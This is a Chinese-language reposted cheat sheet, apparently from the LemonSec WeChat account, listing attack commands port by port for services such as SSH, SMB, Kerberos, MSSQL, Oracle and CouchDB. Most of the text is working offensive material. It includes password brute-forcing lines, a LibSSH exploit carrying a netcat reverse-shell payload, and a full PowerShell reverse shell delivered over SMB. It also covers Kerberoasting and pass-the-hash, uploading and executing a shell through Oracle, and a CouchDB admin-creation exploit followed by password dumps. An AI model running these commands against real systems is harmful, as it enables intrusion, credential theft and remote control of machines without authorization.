端口漏洞手册【建议收藏】
2023-4-5 00:2:52 Author: LemonSec(查看原文) 阅读量:27 收藏

端口 21 - FTP

nmap --script ftp-* -p 21 10.11.1.111

端口 22 - SSH

# Enum SSH# Get versionnmap 10.11.1.1 -p22 -sV# Get bannernc 10.11.1.1 22# Get login bannerssh [email protected]10.11.11.1# Get algorythms supporteednmap -p22 10.11.1.1 --script ssh2-enum-algos# Check weak keysnmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full# Check auth methodsnmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"

# User can ask to execute a command right after authentication before it’s default command or shell is executed$ ssh -v [email protected]10.10.1.111 id...Password:debug1: Authentication succeeded (keyboard-interactive).Authenticated to 10.10.1.111 ([10.10.1.1114]:22).debug1: channel 0: new [client-session]debug1: Requesting no-more-sessions@openssh.comdebug1: Entering interactive session.debug1: pledge: networkdebug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0debug1: Sending command: iddebug1: client_input_channel_req: channel 0 rtype exit-status reply 0debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0uid=1000(user) gid=100(users) groups=100(users)debug1: channel 0: free: client-session, nchannels 1Transferred: sent 2412, received 2480 bytes, in 0.1 secondsBytes per second: sent 43133.4, received 44349.5debug1: Exit status 0

# Check Auth Methods:$ ssh -v 10.10.1.111OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019...debug1: Authentications that can continue: publickey,password,keyboard-interactive

# Force Auth Method:$ ssh -v 10.10.1.111 -o PreferredAuthentications=password...debug1: Next authentication method: password

# BruteForce:patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M sshncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

# LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access # Idpython /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id# Reversepython /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"

# SSH FUZZ# https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

# cpan Net::SSH2./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

use auxiliary/fuzzers/ssh/ssh_version_2

# SSH-AUDIT# https://github.com/arthepsy/ssh-audit

# Enum users < 7.7:# https://www.exploit-db.com/exploits/45233https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.pypython ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

# SSH Leaks:https://shhgit.darkport.co.uk/

# SSH bruteforce# https://github.com/kitabisa/ssb

端口 23 - Telnet

# Get bannertelnet 10.11.1.110# Bruteforce passwordpatator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'

端口 25 - SMTP

nc -nvv 10.11.1.111 25HELO foo
telnet 10.11.1.111 25VRFY root
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111
# SMTP relaymsfconsoleuse auxiliary/scanner/smtp/smtp_relayset RHOSTS <IP or File>set MAILFROM <PoC email address>set MAILTO <your email address>run
# Send email unauth:
MAIL FROM:[email protected]RCPT TO:[email protected]DATAtest
.
Receive:250 OK

端口 43 - Whois

whois -h 10.10.1.111 -p 43 "domain.com"echo "domain.com" | nc -vn 10.10.1.111 43whois -h 10.10.1.111 -p 43 "a') or 1=1#"

端口 53 - DNS

# Transfer zone
dig AXFR domain.com @10.10.10.10# dig +multi AXFR @ns1.insecuredns.com insecuredns.comdnsrecon -t axfr -d domainfierce -dns domain.com

端口 69 - UDP - TFTP

  • 服务器 1.3、1.4、1.9、2.1 等中的漏洞 tftp

  • 检查与 FTP 端口 21 相同

nmap -p69 --script=tftp-enum.nse 10.11.1.111

端口 79 - Finger

nc -vn 10.11.1.111 79echo "root" | nc -vn 10.11.1.111 79

# User enumerationfinger @10.11.1.111 #List usersfinger [email protected]10.11.1.111 #Get info of userfinger [email protected]10.11.1.111 #Get info of user

finger "|/bin/id@example.com"finger "|/bin/ls -a /@example.com"

端口 88 - Kerberos

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IPuse auxiliary/gather/kerberos_enumusers # MSF

# Check for Kerberoasting: GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john

# GetUserSPNsASREPRoast:impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# Kerberoasting: impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

# Overpass The Hash/Pass The Key (PTK):python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>python3 getTGT.py <domain_name>/<user_name>:[password]

# Using TGT key to excute remote commands from the following impacket scripts:

python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# https://www.tarlogic.com/blog/como-funciona-kerberos/# https://www.tarlogic.com/blog/como-atacar-kerberos/

python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

# https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/# https://github.com/GhostPack/Rubeus# https://github.com/fireeye/SSSDKCMExtractor# https://gitlab.com/Zer1t0/cerbero

端口 110 - Pop3

telnet 10.11.1.111USER [email protected]PASS admin

# or:

USER pellePASS admin

# List all emailslist

# Retrieve email number 5, for exampleretr 9

端口 111 - RPC 绑定

rpcinfo -p 10.11.1.111rpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall

端口 135 - MSRPC

nmap 10.11.1.111 --script=msrpc-enummsf > use exploit/windows/dcerpc/ms03_026_dcom

# Endpoint Mapper Service Discoveryuse auxiliary/scanner/dcerpc/endpoint_mapper

#Hidden DCERPC Service Discoveryuse auxiliary/scanner/dcerpc/hidden

# Remote Management Interface Discoveryuse auxiliary/scanner/dcerpc/management

# DCERPC TCP Service Auditoruse auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

impacket-rpcdump

# Enum network interface# https://github.com/mubix/IOXIDResolver

端口 139/445 - SMB

# Enum hostnameenum4linux -n 10.11.1.111nmblookup -A 10.11.1.111nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111

# Get Versionsmbver.sh 10.11.1.111Msfconsole;use scanner/smb/smb_versionngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' smbclient -L \\\\10.11.1.111

# Get Sharessmbmap -H 10.11.1.111 -R echo exit | smbclient -L \\\\10.11.1.111smbclient \\\\10.11.1.111\\smbclient -L //10.11.1.111 -Nnmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111smbclient -L \\\\10.11.1.111\\# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"smbclient -L //10.11.1.111/ --option='client min protocol=NT1'

# Check null sessionssmbmap -H 10.11.1.111rpcclient -U "" -N 10.11.1.111smbclient //10.11.1.111/IPC$ -N

# Exploit null sessionsenum -s 10.11.1.111enum -U 10.11.1.111enum -P 10.11.1.111enum4linux -a 10.11.1.111#https://github.com/cddmp/enum4linux-ng/enum4linux-ng.py 10.11.1.111 -A -C/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

# Connect to username sharessmbclient //10.11.1.111/share -U username

# Connect to share anonymouslysmbclient \\\\10.11.1.111\\smbclient //10.11.1.111/smbclient //10.11.1.111/smbclient //10.11.1.111/<""share name"">rpcclient -U " " 10.11.1.111rpcclient -U " " -N 10.11.1.111

# Check vulnsnmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111

# Multi exploitsmsfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run

# Bruteforce loginmedusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvvnmap –script smb-brute 10.11.1.111

# nmap smb enum & vuln nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111

# Mount smb volume linuxmount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

# rpcclient commandsrpcclient -U "" 10.11.1.111 srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall

# Run cmd over smb from linuxwinexe -U username //10.11.1.111 "cmd.exe" --system

# smbmapsmbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enumsmbmap.py -u username -p '[email protected]$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCEsmbmap.py -H 10.11.1.111 -u username -p '[email protected]$$w0rd1234!' -L # Drive Listingsmbmap.py -u username -p '[email protected]$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

# Check\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "

# CrackMapExeccrackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --localcrackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa

# Impacketpython3 samdump.py SMB 172.21.0.0

# Check for systems with SMB Signing not enabledpython3 RunFinger.py -i 172.21.0.0/24

端口 161/162 UDP - SNMP

nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-userssnmp-check 10.11.1.111 -c public|private|communitysnmpwalk -c public -v1 ipaddress 1snmpwalk -c private -v1 ipaddress 1snmpwalk -c manager -v1 ipaddress 1onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X

# Impacketpython3 samdump.py SNMP 172.21.0.0

# MSF aux modules auxiliary/scanner/misc/oki_scanner auxiliary/scanner/snmp/aix_version auxiliary/scanner/snmp/arris_dg950 auxiliary/scanner/snmp/brocade_enumhash auxiliary/scanner/snmp/cisco_config_tftp auxiliary/scanner/snmp/cisco_upload_file auxiliary/scanner/snmp/cnpilot_r_snmp_loot auxiliary/scanner/snmp/epmp1000_snmp_loot auxiliary/scanner/snmp/netopia_enum auxiliary/scanner/snmp/sbg6580_enum auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login

端口 389,636 - LDAP

jxplorerldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txtcat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt# Check # https://github.com/ropnop/go-windapsearch

端口 443 - HTTPS

./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html# Check for mod_ssl,OpenSSL version Openfuck

端口 500 - ISAKMP IKE

ike-scan 10.11.1.111

端口 513 - 登录

apt install rsh-clientrlogin -l root 10.11.1.111

端口 541 - FortiNet SSLVPN

端口 1433 - MSSQL

nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111use auxiliary/scanner/mssql/mssql_pinguse auxiliary/scanner/mssql/mssql_loginuse exploit/windows/mssql/mssql_payloadsqsh -S 10.11.1.111 -U sa xp_cmdshell 'date' go



EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")'

https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

端口 1521 - Oracle

oscanner -s 10.11.1.111 -P 1521tnscmd10g version -h 10.11.1.111tnscmd10g status -h 10.11.1.111nmap -p 1521 -A 10.11.1.111nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-bruteMSF: good modules under auxiliary/admin/oracle and scanner/oracle

# https://github.com/quentinhardy/odat./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE

# Upload reverse shell with ODAT:./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe

# and run it:./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe

端口 2000 - 思科 sccp

# cisco-audit-toolCAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt

# cisco-smart-installhttps://github.com/Sab0tag3d/SIET/sudo python siet.py -g -i 192.168.0.1

端口 2049 - NFS

nmap -p 111,2049 --script nfs-ls,nfs-showmount

showmount -e 10.11.1.111

# If you find anything you can mount it like this:

mount 10.11.1.111:/ /tmp/NFS –o nolockmount -t nfs 10.11.1.111:/ /tmp/NFS –o nolock

端口 2100 - Oracle XML DB

端口 3306 - MySQL

nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306

mysql --host=10.11.1.111 -u root -p

# MYSQL UDF 4.x/5.0https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

端口 3389 - RDP

nmap -p 3389 --script=rdp-vuln-ms12-020.nserdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111rdesktop -u guest -p guest 10.11.1.111 -g 94%ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v

端口 5432 - PostgreSQL

psql -h 10.10.1.111 -U postgres -W

# Default credspostgres : postgrespostgres : passwordpostgres : adminadmin : adminadmin : password

pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump

端口 5900 - VNC

nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111

端口 5984 - CouchDB

curl http://example.com:5984/curl -X GET http://IP:5984/_all_dbscurl -X GET http://user:[email protected]:5984/_all_dbs

# CVE-2017-12635 RCE

# Create usercurl -X PUT ‘http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ‘{ “type”: “user”, “name”: “chenny”, “roles”: [“_admin”], “roles”: [], “password”: “password” }’

# Dump databasecurl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword <ds/_all_docs?include_docs=true -u chenny:-Xpassword

# Dump passwordscurl -X GET http://user:[email protected]:5984/passwords

端口 5985 - WinRM

# https://github.com/Hackplayers/evil-winrmgem install evil-winrmevil-winrm -i 10.11.1.111 -u Administrator -p 'password1'evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder

端口 6379 - Redis

# https://github.com/Avinash-acid/Redis-Server-Exploitpython redis.py 10.10.10.160 redis

端口 8172 - MsDeploy

# Microsoft IIS Deploy portIP:8172/msdeploy.axd

端口 5601/920

端口 27017-19/27080/28017 - MongoDB

未知端口

amap -d 10.11.1.111 8000
netcat:连接到端口。可以回显字符串或给shellnc -nv 10.11.1.111 110
sfuzz:可以连接到端口,udptcp,避免关闭连接,使用基本的 HTTP 配置

RCE 端口

侵权请私聊公众号删文

 热文推荐  

欢迎关注LemonSec
觉得不错点个“赞”、“在看“

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247543890&idx=2&sn=b4481a7a21eea558d190fef4b914d618&chksm=f9e34309ce94ca1fa6eb9e44739a9a72e144f2170147a680bb1eac14f52aae2142df8c28b46d#rd
如有侵权请联系:admin#unsafe.sh